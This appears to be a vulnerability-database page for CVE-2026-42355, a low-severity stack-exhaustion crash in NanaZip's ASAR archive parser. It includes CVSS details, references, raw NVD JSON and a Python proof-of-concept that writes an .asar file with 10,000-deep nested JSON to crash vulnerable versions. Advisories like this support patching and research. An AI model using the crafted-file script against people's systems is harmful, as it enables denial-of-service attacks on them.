CVE-2026-42355

Description

NanaZip is an open source file archive. From 5.0.1252.0 to before 6.0.1698.0, an uncontrolled recursion vulnerability exists in the Electron Archive (ASAR) parser in NanaZip. When opening a crafted .asar file with deeply nested JSON in the header, both nlohmann::json::parse and the handler's GetAllPaths function recurse without depth limits, exhausting the thread stack and crashing the NanaZip process. This vulnerability is fixed in 6.0.1698.0.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

NanaZip 5.0.1252.0 至 6.0.1698.0 之前

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import json
import struct
import os

# Create a deeply nested JSON structure to trigger stack overflow
deep_json = {}
current = deep_json

# Set recursion depth (e.g., 10000) to exceed stack limit
recursion_depth = 10000
for _ in range(recursion_depth):
    current["next"] = {}
    current = current["next"]

current["payload"] = "crash"

# Convert to JSON string
json_str = json.dumps(deep_json, separators=(',', ':'))

# ASAR file format: 4-byte size (little endian) + JSON + file content
header_size = len(json_str)
header = struct.pack("<I", header_size) + json_str.encode('utf-8')

# Write the crafted ASAR file
filename = "exploit.asar"
with open(filename, "wb") as f:
    f.write(header)
    # Append dummy content
    f.write(b"MALICIOUS_CONTENT")

print(f"[+] Crafted ASAR file saved as {filename}")
print(f"[+] JSON nesting depth: {recursion_depth}")
print("[+] Open this file with a vulnerable version of NanaZip to trigger the crash.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42355
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42355
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42355/
[4] VulDB https://vuldb.com/cve/CVE-2026-42355
[5] https://github.com/M2Team/NanaZip/security/advisories/GHSA-4gxf-p4q6-gfrf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42355", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:41.260", "lastModified": "2026-05-13T16:26:29.697", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanaZip is an open source file archive. From 5.0.1252.0 to before 6.0.1698.0, an uncontrolled recursion vulnerability exists in the Electron Archive (ASAR) parser in NanaZip. When opening a crafted .asar file with deeply nested JSON in the header, both nlohmann::json::parse and the handler's GetAllPaths function recurse without depth limits, exhausting the thread stack and crashing the NanaZip process. This vulnerability is fixed in 6.0.1698.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-674"}]}], "references": [{"url": "https://github.com/M2Team/NanaZip/security/advisories/GHSA-4gxf-p4q6-gfrf", "source": "[email protected]"}]}}